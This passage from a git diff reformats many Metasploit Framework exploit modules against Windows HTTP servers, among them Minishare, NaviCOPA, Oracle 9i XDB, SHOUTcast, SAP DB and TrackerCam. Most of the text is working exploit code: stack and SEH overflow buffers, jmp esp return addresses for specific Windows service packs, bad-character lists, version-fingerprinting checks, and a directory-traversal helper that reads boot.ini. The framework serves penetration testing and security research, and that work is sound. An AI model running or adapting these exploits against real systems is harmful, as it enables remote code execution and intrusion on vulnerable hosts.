target.ret) - + send_request_raw({ 'uri' => '/%' + buf }, 5) diff --git a/modules/exploits/windows/http/minishare_get_overflow.rb b/modules/exploits/windows/http/minishare_get_overflow.rb index dfd78bda65..3414f2ccd0 100644 --- a/modules/exploits/windows/http/minishare_get_overflow.rb +++ b/modules/exploits/windows/http/minishare_get_overflow.rb 
@@ -3,32 +3,29 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Minishare 1.4.1 Buffer Overflow', 'Description' => %q{ - This is a simple buffer overflow for the minishare web + This is a simple buffer overflow for the minishare web server. This flaw affects all versions prior to 1.4.2. This is a plain stack overflow that requires a "jmp esp" to reach the payload, making this difficult to target many platforms at once. This module has been successfully tested against 1.4.1. Version 1.3.4 and below do not seem to be vulnerable. - }, 'Author' => [ 'acaro <acaro@jervus.it>' ], 'License' => BSD_LICENSE, @@ -39,7 +36,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'OSVDB', '11530'], [ 'BID', '11620'], [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html'], - ], 'Privileged' => false, 'Payload' => @@ -48,10 +44,9 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x40", 'MinNops' => 64, 'StackAdjustment' => -3500, - }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['Windows 2000 SP0-SP3 English', { 'Rets' => [ 1787, 0x7754a3ab ]}], # jmp esp ['Windows 2000 SP4 English', { 'Rets' => [ 1787, 0x7517f163 ]}], # jmp esp 
@@ -70,12 +65,12 @@ class Metasploit3 < Msf::Exploit::Remote uri = rand_text_alphanumeric(target['Rets'][0]) uri << [target['Rets'][1]].pack('V') uri << payload.encoded - + print_status("Trying target address 0x%.8x..." % target['Rets'][1]) send_request_raw({ 'uri' => uri }, 5) - + handler end diff --git a/modules/exploits/windows/http/navicopa_get_overflow.rb b/modules/exploits/windows/http/navicopa_get_overflow.rb index ea19125372..2f7c9ed738 100644 --- a/modules/exploits/windows/http/navicopa_get_overflow.rb +++ b/modules/exploits/windows/http/navicopa_get_overflow.rb @@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'NaviCOPA 2.0.1 URL Handling Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in NaviCOPA 2.0.1. + This module exploits a stack overflow in NaviCOPA 2.0.1. The vulnerability is caused due to a boundary error within the handling of URL parameters. }, 
@@ -47,44 +45,47 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['NaviCOPA 2.0.1 Universal', { 'Ret' => 0x1009b4ff }], # IV320009.dll ], 'DisclosureDate' => 'Sep 28 2006', 'DefaultTarget' => 0)) - - register_options( [ Opt::RPORT(80) ], self.class ) + + register_options( + [ + Opt::RPORT(80) + ], self.class ) end def check connect - + sock.put("GET / HTTP/1.0\r\n\r\n") resp = sock.get_once disconnect - - if (resp =~ /2.01 11th September/) - return Exploit::CheckCode::Vulnerable - end - return Exploit::CheckCode::Safe + + if (resp =~ /2.01 11th September/) + return Exploit::CheckCode::Vulnerable + end + return Exploit::CheckCode::Safe end def exploit connect - + sploit = rand_text_alphanumeric(228, payload_badchars) - sploit << [target.ret].pack('V') + payload.encoded - + sploit << [target.ret].pack('V') + payload.encoded + uri = '/' + sploit - + res = "GET #{uri} HTTP/1.1\r\n\r\n" print_status("Trying target %s" % target.name) sock.put(res) sock.close - + handler disconnect end diff --git a/modules/exploits/windows/http/novell_messenger_acceptlang.rb b/modules/exploits/windows/http/novell_messenger_acceptlang.rb index 9037bfe0c9..8c038f3e62 100644 --- a/modules/exploits/windows/http/novell_messenger_acceptlang.rb +++ b/modules/exploits/windows/http/novell_messenger_acceptlang.rb 
@@ -3,23 +3,21 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Novell Messenger Server 2.0 Accept-Language Overflow', 'Description' => %q{ This module exploits a stack overflow in Novell GroupWise @@ -28,7 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote To overwrite the return address on the stack, we must first pass a memcpy() operation that uses pointers we supply. Due to the large list of restricted characters and the limitations of the current - encoder modules, very few payloads are usable. + encoder modules, very few payloads are usable. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -42,18 +40,18 @@ class Metasploit3 < Msf::Exploit::Remote 'Privileged' => true, 'Payload' => { - 'Space' => 500, + 'Space' => 500, 'BadChars' => "\x00\x0a\x2c\x3b"+ [*("A".."Z")].join, 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['Groupwise Messenger DClient.dll v10510.37', { 'Rets' => [0x6103c3d3, 0x61041010] }], ], 'DisclosureDate' => 'Apr 13 2006')) - - register_options( [ Opt::RPORT(8300) ], self.class ) + + register_options( [ Opt::RPORT(8300) ], self.class ) end def exploit 
@@ -65,13 +63,13 @@ class Metasploit3 < Msf::Exploit::Remote lang[264, 4] = [target['Rets'][0]].pack('V') # JMP ESP lang[268, 2] = "\xeb\x06" lang[276, payload.encoded.length] = payload.encoded - + res = "GET / HTTP/1.1\r\nAccept-Language: #{lang}\r\n\r\n" - + print_status("Trying target address 0x%.8x..." % target['Rets'][0]) sock.put(res) sock.close - + handler disconnect end diff --git a/modules/exploits/windows/http/nowsms.rb b/modules/exploits/windows/http/nowsms.rb index 006f12a6bb..23b9703df9 100644 --- a/modules/exploits/windows/http/nowsms.rb +++ b/modules/exploits/windows/http/nowsms.rb @@ -3,28 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Now SMS/MMS Gateway Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in Now SMS/MMS Gateway v2007.06.27. - By sending a specially crafted GET request, an attacker may be able to execute - arbitrary code. + By sending a specially crafted GET request, an attacker may be able to execute + arbitrary code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 
@@ -47,22 +45,21 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Now SMS/MMS Gateway v2007.06.27', { 'Ret' => 0x10002f9d } ], # CALL ESP : SMSHMAC.DLL ], - 'DefaultTarget' => 0, + 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 19 2008')) - - register_options( [ Opt::RPORT(8800) ], self.class ) + register_options( [ Opt::RPORT(8800) ], self.class ) end def exploit c = connect data = Rex::Text.encode_base64(rand_text_english(129) + [target.ret].pack('V') + payload.encoded) - + print_status("Trying target #{target.name}...") res = send_request_raw({ @@ -75,6 +72,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 5) handler - end - + end + end diff --git a/modules/exploits/windows/http/oracle9i_xdb_pass.rb b/modules/exploits/windows/http/oracle9i_xdb_pass.rb index 63a67256c6..971511209e 100644 --- a/modules/exploits/windows/http/oracle9i_xdb_pass.rb +++ b/modules/exploits/windows/http/oracle9i_xdb_pass.rb @@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Oracle 9i XDB HTTP PASS Overflow (win32)', 'Description' => %q{ - This module exploits a stack overflow in the authorization + This module exploits a stack overflow in the authorization code of the Oracle 9i HTTP XDB service. David Litchfield, has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB), during a seminar on "Variations 
@@ -51,15 +49,17 @@ class Metasploit3 < Msf::Exploit::Remote 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Oracle 9.2.0.1 Universal', { 'Ret' => 0x60616d46 } ], ], - 'DefaultTarget' => 0, + 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 18 2003')) - - register_options( [ Opt::RPORT(8080) ], self.class ) + register_options( + [ + Opt::RPORT(8080) + ], self.class ) end def check @@ -67,29 +67,29 @@ class Metasploit3 < Msf::Exploit::Remote sock.put("GET / HTTP/1.0\r\n\r\n") resp = sock.get_once disconnect - + if (resp =~ /9.2.0.1.0/) return Exploit::CheckCode::Vulnerable - end + end return Exploit::CheckCode::Safe end def exploit connect - sploit = rand_text_english(4, payload_badchars) + ":" - sploit << rand_text_english(442, payload_badchars) - sploit << "\xeb\x64" + make_nops(2) + [target.ret].pack('V') + sploit = rand_text_english(4, payload_badchars) + ":" + sploit << rand_text_english(442, payload_badchars) + sploit << "\xeb\x64" + make_nops(2) + [target.ret].pack('V') sploit << make_nops(266) + "\xeb\x10" + make_nops(109) + payload.encoded - req = "Authorization: Basic #{Rex::Text.encode_base64(sploit)}\r\n\r\n" - - res = "GET / HTTP/1.1\r\n" + "Host: #{rhost}:#{rport}\r\n" + req - + req = "Authorization: Basic #{Rex::Text.encode_base64(sploit)}\r\n\r\n" + + res = "GET / HTTP/1.1\r\n" + "Host: #{rhost}:#{rport}\r\n" + req + print_status("Trying target %s..." % target.name) - + sock.put(res) - + handler disconnect end diff --git a/modules/exploits/windows/http/peercast_url.rb b/modules/exploits/windows/http/peercast_url.rb index 7668491441..b75de863c7 100644 --- a/modules/exploits/windows/http/peercast_url.rb +++ b/modules/exploits/windows/http/peercast_url.rb 
@@ -3,29 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'PeerCast <= 0.1216 URL Handling Buffer Overflow (win32)', 'Description' => %q{ - This module exploits a stack overflow in PeerCast <= v0.1216. + This module exploits a stack overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters. - }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -36,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote ['OSVDB', '23777'], ['BID', '17040'], ['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'], - ], 'Privileged' => false, 'Payload' => @@ -46,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }], ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }], 
@@ -54,26 +50,26 @@ class Metasploit3 < Msf::Exploit::Remote ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }], ], 'DisclosureDate' => 'Mar 8 2006')) - - register_options( [ Opt::RPORT(7144) ], self.class ) + + register_options( [ Opt::RPORT(7144) ], self.class ) end def exploit connect - + pat = rand_text_alphanumeric(1024) pat[768, 4] = [target.ret].pack('V') pat[812, 5] = [0xe9, -517].pack('CV') pat[300, payload.encoded.length] = payload.encoded - + uri = '/stream/?' + pat - + res = "GET #{uri} HTTP/1.0\r\n\r\n" - + print_status("Trying target address 0x%.8x..." % target.ret) sock.put(res) sock.close - + handler disconnect end diff --git a/modules/exploits/windows/http/privatewire_gateway.rb b/modules/exploits/windows/http/privatewire_gateway.rb index b77d1f5ff8..0c59cd78e1 100644 --- a/modules/exploits/windows/http/privatewire_gateway.rb +++ b/modules/exploits/windows/http/privatewire_gateway.rb @@ -3,30 +3,28 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - # This file may only be distributed as part of the Metasploit Framework. # Any other use needs a written permission from the author. require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Private Wire Gateway Buffer Overflow', 'Description' => %q{ - This exploits a buffer overflow in the ADMCREG.EXE used - in the PrivateWire Online Registration Facility. + This exploits a buffer overflow in the ADMCREG.EXE used + in the PrivateWire Online Registration Facility. }, 'Author' => 'Michael Thumann <mthumann[at]ernw.de>', 'License' => MSF_LICENSE, 
@@ -44,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['Windows 2000 English SP0', { 'Ret' => 0x77e3c289 }], # jmp esp user32.dll ['Windows 2000 English SP1', { 'Ret' => 0x77e3cb4c }], # jmp esp user32.dll @@ -53,22 +51,22 @@ class Metasploit3 < Msf::Exploit::Remote ['Windows 2000 English SP4', { 'Ret' => 0x77e3c256 }], # jmp esp user32.dll ['Windows 2003 English SP0/SP1', { 'Ret' => 0x77d74c94 }], # jmp esp user32.dll ['Debugging', { 'Ret' => 0x41414141 }], # crash - ], + ], 'DefaultTarget' => 4, 'DisclosureDate' => 'Jun 26 2006')) - - register_options( - [ - OptString.new('PATH', [ true, "Installation path of Privatewire", 'C:\Cipgw' ]) - ], self.class) + + register_options( + [ + OptString.new('PATH', [ true, "Installation path of Privatewire", 'C:\Cipgw' ]) + ], self.class) end def exploit # add 25 to ecx and jmp jmp = "\x6a\x19\x58\x01\xc1\xff\xe1" - + path_offset = datastore['PATH'].length - 8 - + pattern = rand_text_alphanumeric(8192) pattern[0, payload.encoded.length] = payload.encoded pattern[8156 - path_offset, 4] = [target.ret].pack('V') diff --git a/modules/exploits/windows/http/sapdb_webtools.rb b/modules/exploits/windows/http/sapdb_webtools.rb index 1c5dee7232..d256d61bf0 100644 --- a/modules/exploits/windows/http/sapdb_webtools.rb +++ b/modules/exploits/windows/http/sapdb_webtools.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking 
@@ -20,14 +18,14 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'SAP DB 7.4 WebTools Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in SAP DB 7.4 WebTools. - By sending an overly long GET request, it may be possible for - an attacker to execute arbitrary code. Using the PAYLOAD of - windows/shell_bind_tcp or windows/shell_reverse_tcp allows - for the most reliable results. + By sending an overly long GET request, it may be possible for + an attacker to execute arbitrary code. Using the PAYLOAD of + windows/shell_bind_tcp or windows/shell_reverse_tcp allows + for the most reliable results. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -52,31 +50,31 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - [ 'SAP DB 7.4 WebTools', { 'Ret' => 0x1003c95a } ], # wapi.dll 7.4.3.0 + [ 'SAP DB 7.4 WebTools', { 'Ret' => 0x1003c95a } ], # wapi.dll 7.4.3.0 ], 'DisclosureDate' => 'July 5 2007', 'DefaultTarget' => 0)) - register_options( [ Opt::RPORT(9999) ], self.class ) + register_options( [ Opt::RPORT(9999) ], self.class ) end def exploit c = connect - + filler = rand_text_alphanumeric(20774) seh = generate_seh_payload(target.ret) # pretty big... sploit = filler + seh + rand_text_alphanumeric(3000) print_status("Trying to exploit target #{target.name} 0x%.8x" % target.ret) - + res = send_request_raw({ 'uri' => '/webdbm', 'query' => 'Event=DBM_INTERN_TEST&Action=REFRESH&HTTP_COOKIE=' + sploit }, 5) - + handler end diff --git a/modules/exploits/windows/http/shoutcast_format.rb b/modules/exploits/windows/http/shoutcast_format.rb index 798dfcd0a6..9b1a3ac45d 100644 --- a/modules/exploits/windows/http/shoutcast_format.rb +++ b/modules/exploits/windows/http/shoutcast_format.rb 
@@ -3,31 +3,28 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow', 'Description' => %q{ - This module exploits a format string vulnerability in the + This module exploits a format string vulnerability in the Nullsoft SHOUTcast server for Windows. The vulnerability is triggered by requesting a file path that contains format string specifiers. This vulnerability was discovered by Tomasz Trojanowski and Damian Put. - }, 'Author' => [ 'MC', 'mandragore[at]gmail.com'], 'License' => MSF_LICENSE, @@ -37,10 +34,9 @@ class Metasploit3 < Msf::Exploit::Remote [ 'CVE', '2004-1373'], [ 'OSVDB', '12585'], [ 'BID', '12096'], - ], 'Privileged' => false, - 'DefaultOptions' => + 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 
@@ -49,36 +45,35 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 250, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", 'StackAdjustment' => -3500, - }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['Windows NT SP5/SP6a English', { 'Ret' => 0x776a1799 }], # ws2help.dll ['Windows 2000 English ALL', { 'Ret' => 0x75022ac4 }], # ws2help.dll ['Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad }], # ws2help.dll - ['Windows 2003 Server English', { 'Ret' => 0x7ffc0638 }], # PEB return + ['Windows 2003 Server English', { 'Ret' => 0x7ffc0638 }], # PEB return ], 'DisclosureDate' => 'Dec 23 2004')) - - register_options( - [ - Opt::RPORT(8000) - ], self.class) + + register_options( + [ + Opt::RPORT(8000) + ], self.class) end def check r = send_request_raw({ 'uri' => uri }, 5) - + return Exploit::CheckCode::Safe if not r - + m = r.body.match(/Network Audio Server\/([^\s]+)\s+([^<]+)<BR/) return Exploit::CheckCode::Safe if not m - + print_status("This system is running SHOUTcast #{m[1]} on #{m[2]}") - + # SHOUTcast Distributed Network Audio Server/win32 v1.9.2<BR> if (m[1] =~ /v1\.([0-8]\.|9\.[0-3])$/) if (m[2] == "win32") @@ -86,16 +81,16 @@ class Metasploit3 < Msf::Exploit::Remote end print_status("Vulnerable version detected, but not a win32 host") end - + return Exploit::CheckCode::Safe end def exploit - + num = 1046 - payload.encoded.length uri = '/content/%#0' + num.to_s + 'x' + payload.encoded uri << "\xeb\x06" + rand_text_alphanumeric(2) - uri << [target.ret].pack('V') + uri << [target.ret].pack('V') uri << "\xe9\x2d\xff\xff\xff" uri << '#0100x.mp3' @@ -103,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote send_request_raw({ 'uri' => uri }, 5) - + handler disconnect end diff --git a/modules/exploits/windows/http/shttpd_post.rb b/modules/exploits/windows/http/shttpd_post.rb index 9af7122e3e..af6df4b76c 100644 --- a/modules/exploits/windows/http/shttpd_post.rb +++ b/modules/exploits/windows/http/shttpd_post.rb 
@@ -3,29 +3,27 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking -include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'SHTTPD <= 1.34 URI-Encoded POST Request Overflow (win32)', 'Description' => %q{ - This module exploits a stack overflow in SHTTPD <= 1.34. + This module exploits a stack overflow in SHTTPD <= 1.34. The vulnerability is caused due to a boundary error within the handling of POST requests. Based on an original exploit by skOd - but using a different method found by hdm. + but using a different method found by hdm. }, 'Author' => [ 'LMH <lmh [at] info-pull.com>', 'hdm', 'skOd'], 'License' => MSF_LICENSE, @@ -43,7 +41,7 @@ include Msf::Exploit::Remote::Tcp 'BadChars' => "\x00", }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ # Except for Spanish locale target, all come from: # http://metasploit.com/users/opcode/msfopcode.cgi @@ -59,13 +57,16 @@ include Msf::Exploit::Remote::Tcp [ 'Windows XP English SP0-SP1', { 'Ret' => 0x71aa1aaa } ], ], 'DisclosureDate' => 'Oct 6 2006')) - - register_options( [ Opt::RPORT(80) ], self.class ) + + register_options( + [ + Opt::RPORT(80) + ], self.class ) end def exploit connect - + pat = rand_text_alphanumeric(4000) pat[8,4] = [target.ret].pack('V') pat[103, payload.encoded.length] = payload.encoded @@ -76,7 +77,7 @@ include Msf::Exploit::Remote::Tcp print_status("Trying target address 0x%.8x..." % target.ret) sock.put(res) sock.close - + handler disconnect end 
diff --git a/modules/exploits/windows/http/sybase_easerver.rb b/modules/exploits/windows/http/sybase_easerver.rb index 183f2fada9..cfa9c94d23 100644 --- a/modules/exploits/windows/http/sybase_easerver.rb +++ b/modules/exploits/windows/http/sybase_easerver.rb @@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Sybase EAServer 5.2 Remote Stack Overflow', 'Description' => %q{ - This module exploits a stack overflow in the Sybase EAServer Web + This module exploits a stack overflow in the Sybase EAServer Web Console. The offset to the SEH frame appears to change depending on what version of Java is in use by the remote server, making this exploit somewhat unreliable. 
@@ -46,25 +44,23 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 1000, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\%", 'StackAdjustment' => -3500, - }, 'Platform' => 'win', - 'Targets' => - [ + 'Targets' => + [ # Technically we could combine these into a single multi-return string... - ['Windows All - Sybase EAServer 5.2 - jdk 1.3.1_11', {'Ret' => 0x6d4548ff, 'Offset' => 3820}], - ['Windows All - Sybase EAServer 5.2 - jdk 1.3.?.?', {'Ret' => 0x6d4548ff, 'Offset' => 3841}], - ['Windows All - Sybase EAServer 5.2 - jdk 1.4.2_06', {'Ret' => 0x08041b25, 'Offset' => 3912}], - ['Windows All - Sybase EAServer 5.2 - jdk 1.4.1_02', {'Ret' => 0x08041b25, 'Offset' => 3925}], + ['Windows All - Sybase EAServer 5.2 - jdk 1.3.1_11', {'Ret' => 0x6d4548ff, 'Offset' => 3820}], + ['Windows All - Sybase EAServer 5.2 - jdk 1.3.?.?', {'Ret' => 0x6d4548ff, 'Offset' => 3841}], + ['Windows All - Sybase EAServer 5.2 - jdk 1.4.2_06', {'Ret' => 0x08041b25, 'Offset' => 3912}], + ['Windows All - Sybase EAServer 5.2 - jdk 1.4.1_02', {'Ret' => 0x08041b25, 'Offset' => 3925}], ], 'DisclosureDate' => 'Jul 25 2005')) - register_options( - [ - OptString.new('DIR', [ true, "Directory of Login.jsp script", '/WebConsole/' ]), - Opt::RPORT(8080) - ], self.class) - + register_options( + [ + OptString.new('DIR', [ true, "Directory of Login.jsp script", '/WebConsole/' ]), + Opt::RPORT(8080) + ], self.class) end def exploit @@ -86,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', } }, 5) - + print_status("Overflow request sent, sleeping for four seconds") sleep(4) end diff --git a/modules/exploits/windows/http/trackercam_phparg_overflow.rb b/modules/exploits/windows/http/trackercam_phparg_overflow.rb index d62a026df4..8b407225bd 100644 --- a/modules/exploits/windows/http/trackercam_phparg_overflow.rb +++ b/modules/exploits/windows/http/trackercam_phparg_overflow.rb 
@@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -20,16 +18,15 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'TrackerCam PHP Argument Buffer Overflow', 'Description' => %q{ - This module exploits a simple stack overflow in the + This module exploits a simple stack overflow in the TrackerCam web server. All current versions of this software are vulnerable to a large number of security issues. This module abuses the directory traversal flaw to gain information about the system and then uses the PHP overflow to execute arbitrary code. - }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -41,7 +38,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'OSVDB', '13955'], [ 'BID', '12592'], [ 'URL', 'http://aluigi.altervista.org/adv/tcambof-adv.txt'], - ], 'Privileged' => true, 'DefaultOptions' => 
@@ -53,28 +49,27 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 2048, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", 'StackAdjustment' => -3500, - }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ # EyeWD.exe has a null and we can not use a partial overwrite. # All of the loaded application DLLs have a null in the address, # except CPS.dll, which moves around between instances :-( - + ['Windows 2000 English', { 'Ret' => 0x75022ac4 }], # ws2help.dll ['Windows XP English SP0/SP1', { 'Ret' => 0x71aa32ad }], # ws2help.dll ['Windows NT 4.0 SP4/SP5/SP6', { 'Ret' => 0x77681799 }], # ws2help.dll - - # Windows XP SP2 and Windows 2003 are not supported yet :-/ + + # Windows XP SP2 and Windows 2003 are not supported yet :-/ ], 'DisclosureDate' => 'Feb 18 2005', 'DefaultTarget' => 0)) - register_options( - [ - Opt::RPORT(8090) - ], self.class) + register_options( + [ + Opt::RPORT(8090) + ], self.class) end def check @@ -82,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => '/tuner/ComGetLogFile.php3', 'query' => 'fn=../HTTPRoot/socket.php3' }, 5) - + if (res and res.body =~ /fsockopen/) fp = fingerprint() print_status("Detected a vulnerable TrackerCam installation on #{fp}") @@ -90,25 +85,25 @@ class Metasploit3 < Msf::Exploit::Remote end return Exploit::CheckCode::Safe end - + def exploit c = connect - + buf = rand_text_english(8192) seh = generate_seh_payload(target.ret) buf[257, seh.length] = seh - + print_status("Sending request...") res = send_request_raw({ 'uri' => '/tuner/TunerGuide.php3', 'query' => 'userID=' + buf }, 5) - + handler end def download(path) - + res = send_request_raw({ 'uri' => '/tuner/ComGetLogFile.php3', 'query' => 'fn=' + ("../" * 10) + path 
@@ -120,31 +115,31 @@ class Metasploit3 < Msf::Exploit::Remote return if not m return m[1] end - + def fingerprint - + res = download(rand_text_alphanumeric(12) + '.txt') return if not res - + m = res.match(/in <b>(.*)<\/b> on line/smi) return if not m - + path = m[1] - + print_status("TrackerCam installation path is #{path}") - - if (path !~ /^C/i) + + if (path !~ /^C/i) print_status("TrackerCam is not installed on the system drive, we can't fingerprint it") return end - - if (path !~ /Program Files/i) + + if (path !~ /Program Files/i) print_status("TrackerCam is installed in a non-standard location") - end - + end + boot = download('boot.ini') return if not boot - + case boot when /Windows XP.*NoExecute/i return "Windows XP SP2+" @@ -156,7 +151,7 @@ class Metasploit3 < Msf::Exploit::Remote return "Windows 2000" else return "Unknown OS/SP" - end + end end - + end diff --git a/modules/exploits/windows/http/trendmicro_officescan.rb b/modules/exploits/windows/http/trendmicro_officescan.rb index 1cdf16b78e..d1aac1eb1e 100644 --- a/modules/exploits/windows/http/trendmicro_officescan.rb +++ b/modules/exploits/windows/http/trendmicro_officescan.rb @@ -1,19 +1,28 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework 